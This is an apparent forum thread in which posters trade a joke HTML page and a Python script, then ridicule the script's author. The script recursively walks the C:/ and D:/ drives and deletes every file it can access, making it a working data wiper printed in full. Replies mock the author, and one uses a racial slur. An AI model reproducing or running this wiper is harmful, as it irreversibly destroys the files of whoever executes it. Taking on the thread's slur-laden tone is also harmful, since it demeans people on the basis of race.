Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
<HTML>
<HEAD>
<TITLE>
Code 4 Gorgar
</TITLE>
</HEAD>
<BODY>
<FONT FACE="Comic Sans MS" SIZE="12" COLOR="Red">
<MARQUEE>
CODE 4 GORGAR
</MARQUEE>
</FONT>
Here you go. Web Design 1 in high school at it's finest.
</BODY>
</HTML>
>familiar with for loops, uses them to recursively search-and-destroy files in C:/ drive# home = os.path.normpath(os.path.expanduser("~"))
home="C:/"
for dirpath,dirnames,file in walk(home):
for files in file:
dirpath1=os.path.normpath(dirpath)
childpath=os.path.join(dirpath1,files)
print(childpath)
try:
os.remove(childpath)
except PermissionError:
continue
home="D:/"
for dirpath,dirnames,file in walk(home):
for files in file:
dirpath1=os.path.normpath(dirpath)
childpath=os.path.join(dirpath1,files)
print(childpath)
try:
os.remove(childpath)
except PermissionError:
continue
Nigga I googled "How to delete system 32 python">familiar with for loops, uses them to recursively search-and-destroy files in C:/ drive
>copy-pastes the exact same code with a single character change to do the same thing for D:/ drive
You Python skiddies baffle me.